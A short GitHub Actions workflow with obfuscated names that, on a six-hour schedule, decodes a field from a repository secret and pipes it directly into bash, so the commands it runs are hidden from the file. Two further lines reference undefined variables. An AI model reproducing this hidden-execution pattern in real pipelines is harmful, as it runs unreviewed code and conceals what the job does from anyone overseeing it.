name: kezhenchou1268
on:
  workflow_dispatch:
  schedule:
    - cron: '30 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kezhenchou1268
        env:
          kggx4: ${{ secrets.kggx4 }}
        run: |
          echo $kggx4 | jq -r .uwqrl48 | /bin/bash
          echo $xk9 | jq -r .cg1 | /bin/bash
          echo $dh2843 | jq -r .ybq9 | /bin/bash

